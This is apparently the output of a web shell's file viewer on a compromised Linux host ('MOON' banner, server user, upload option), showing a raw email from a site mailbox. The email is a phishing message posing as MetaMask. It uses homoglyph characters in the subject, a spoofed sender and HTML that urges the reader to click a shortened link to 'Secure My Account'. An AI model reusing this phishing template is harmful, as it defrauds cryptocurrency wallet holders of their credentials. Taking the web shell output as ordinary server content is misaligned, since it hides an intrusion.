MOON
Server: Apache
System: Linux s5.yayogua.com.py 6.12.0-124.55.3.el10_1.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 7 16:54:02 EDT 2026 x86_64
User: w3com (1005)
PHP: 8.2.32
Disabled: NONE
Upload Files
File: /home/w3com/mail/.info@w3_com_py/new/1754376824.H803787P14904.s3.yayogua.com.py,S=7077
Return-path: <postmaster@a73f415fe9.nxcli.io>
Envelope-to: info@w3.com.py
Delivery-date: Tue, 05 Aug 2025 02:53:44 -0400
Received: from cloudhost-3259332.us-midwest-1.nxcli.net ([209.87.149.210]:31688)
	by s3.yayogua.com.py with esmtps (TLSv1.2:ECDHE-RSA-AES128-GCM-SHA256:128)
	(Exim 4.87)
	(envelope-from <postmaster@a73f415fe9.nxcli.io>)
	id 1ujBYJ-0003nC-Iu
	for info@w3.com.py; Tue, 05 Aug 2025 02:53:44 -0400
Comment: DomainKeys? See http://domainkeys.sourceforge.net/
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=default; d=a73f415fe9.nxcli.io;
  b=hoFCPWe9He38RhjnzN5F1B66HI9ISm3BJhAPmP/gUvk7jSITAR/KRymugShPnjnqun0LCRcYo8bl25Zy0EM6171GYk8KHcBJfjc+ymH/iJGsaxsMvlHAjZILOdWzjyvaZYdYudsywDxRfvBJvk0kY9R3GSX1IJYEEXMqTVjealM1uKGwku58h5bEt8uSg0A7Jy1bX0r1z+RXIuu1msZRRlLb4PxYoVF5GJ86FxHnxAnSUC1gKrmNcZZX+7umNFrq3Zvpz8wGXaStwLYS19TVwxSLb4Z+RpiGtWWT35Js3U1SCxk/sAzmTpxeDS2KbxwIM9amdJpeDl5eejWGwS0YyA==;
  h=Received:Date:Message-ID:To:Subject:X-PHP-Originating-Script:From:Reply-To:MIME-Version:Content-Type:X-Mailer:X-Priority:List-Unsubscribe;
DKIM-Signature: v=1; a=rsa-sha1; c=relaxed; d=a73f415fe9.nxcli.io; h=
	date:message-id:to:subject:from:reply-to:mime-version
	:content-type:list-unsubscribe; s=default; bh=qzt1PN8B7n6QyU4dk5
	AZP1B3LaU=; b=Z8KC1w2sB3VnvagwhDzdutFV446xVJtnuKJAJZO/H2VPBXRtpC
	w2Nq9yfe2z8wDMDh24BXm2rqezTyfEpRu5xmLENr0KB9ERkQ81sVkG2XsBwFfej4
	StMcXBT6OeJTeP8j3doqeikyneNM6GOAxqzFlctETvrCh5fBDHm9XfHwRLC1U+Tm
	4mZ6Qy2zo1EM9lB5+EDA62k2SKcX67pVaNS0ecyXVO0YAfYxRPoSYjpSijgd6arw
	giWMcewrdw0ZuL4ICUyZHTLFfCJaYo4sF6ztju6Xvw4/wpd4HUugIn3sqjrBpcx2
	T7VU9exJvdzR31CVAwWWOwukvFf9CctRsNug==
Received: (qmail 32202 invoked by uid 10186); 5 Aug 2025 06:48:01 +0000
Date: 5 Aug 2025 06:48:01 +0000
Message-ID: <20250805064801.32185.qmail@cloudhost-3259332.us-midwest-1.nxcli.net>
To: info@w3.com.py
Subject: Sеcurity Аlert — Unrecоgnized Lоgin Attеmpt
X-PHP-Originating-Script: 10186:raw.php
From: "MetаMаsk" <ka91vx1j@aqg.io>
Reply-To: ka91vx1j@aqg.io
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8
X-Mailer: PHP/8.2.20
X-Priority: 3
List-Unsubscribe: <mailto:unsubscribe@ka91vx1j@aqg.io>
X-Spam-Status: No, score=4.9
X-Spam-Score: 49
X-Spam-Bar: ++++
X-Ham-Report: Spam detection software, running on the system "s3.yayogua.com.py",
 has NOT identified this incoming email as spam.  The original
 message has been attached to this so you can view it or label
 similar future email.  If you have any questions, see
 root\@localhost for details.
 
 Content preview:  Security Alert: Unrecognized Login Attempt We detected a
   login attempt to your MetaMask account from a new device or location. If this
    was not you, your account may be at risk. No, this wasn’t me – Secure
    My Account Your wallet access may be restricted until you verify this activity.
    If you did not request this, please ignore this message. — MetaMask Security
    Team [...] 
 
 Content analysis details:   (4.9 points, 5.0 required)
 
  pts rule name              description
 ---- ---------------------- --------------------------------------------------
  0.0 URIBL_BLOCKED          ADMINISTRATOR NOTICE: The query to URIBL was blocked.
                             See
                             http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
                              for more information.
                             [URIs: nxcli.io]
  0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The query to
                              Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                            [209.87.149.210 listed in bl.score.senderscore.com]
  0.0 RCVD_IN_VALIDITY_CERTIFIED_BLOCKED RBL: ADMINISTRATOR NOTICE: The
                             query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                             [209.87.149.210 listed in sa-accredit.habeas.com]
  0.0 RCVD_IN_DNSWL_BLOCKED  RBL: ADMINISTRATOR NOTICE: The query to DNSWL
                             was blocked.  See
                             http://wiki.apache.org/spamassassin/DnsBlocklists#DnsBlocklists-dnsbl-block
                              for more information.
                             [209.87.149.210 listed in list.dnswl.org]
 -1.9 BAYES_00               BODY: Bayes spam probability is 0 to 1%
                             [score: 0.0000]
  0.0 HEADER_FROM_DIFFERENT_DOMAINS From and EnvelopeFrom 2nd level mail
                             domains are different
  3.2 FUZZY_SECURITY         BODY: Obfuscated "security"
  0.0 HTML_MESSAGE           BODY: HTML included in message
  0.1 MIME_HTML_ONLY         BODY: Message only has text/html MIME parts
  1.5 HTML_IMAGE_ONLY_20     BODY: HTML: images with 1600-2000 bytes of words
  0.1 DKIM_SIGNED            Message has a DKIM or DK signature, not necessarily valid
  1.8 PYZOR_CHECK            Listed in Pyzor (https://pyzor.readthedocs.io/en/latest/)
  0.1 DKIM_INVALID           DKIM or DK signature exists, but is not valid
X-Spam-Flag: NO


<!DOCTYPE html>
<html lang="en">
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
</head>
<body style="margin:0; padding:0; background:#f9fafb;">
  <center style="font-family:Arial, sans-serif; color:#222; padding:20px;">

    <!-- Logo (hosted on a trusted CDN) -->
    <img
      src="https://raw.githubusercontent.com/MetaMask/brand-resources/master/SVG/metamask-fox.svg"
      alt="MetaMask Logo"
      width="48"
      style="display:block; margin:0 auto 16px; border:none; outline:none;"
    />

    <!-- Headline -->
    <strong style="font-size:18px; color:#f6851b; display:block; margin-bottom:12px;">
      Security Alert: Unrecognized Login Attempt
    </strong>

    <!-- Body copy -->
    <span style="font-size:14px; line-height:1.4; display:block; margin-bottom:16px;">
      We detected a login attempt to your MetaMask account from a new device or location.<br/>
      If this was <strong>not you</strong>, your account may be at risk.
    </span>

    <!-- Call-to-action link as visible text -->
    <a
      href="https://t.co/Q8MzgqJQp4?id=-1370195934168895914-2052"
      style="
        display:inline-block;
        font-size:14px;
        font-weight:bold;
        color:#ffffff;
        background-color:#f6851b;
        text-decoration:none;
        padding:10px 20px;
        border-radius:4px;
      "
    >
      No, this wasn’t me – Secure My Account
    </a>

    <!-- Footer copy -->
    <span style="font-size:12px; color:#666666; display:block; margin:16px 0 0;">
      Your wallet access may be restricted until you verify this activity.<br/>
      If you did not request this, please ignore this message.
    </span>

    <span style="font-size:12px; color:#aaaaaa; display:block; margin-top:8px;">
      — MetaMask Security Team
    </span>

  </center>
</body>
</html>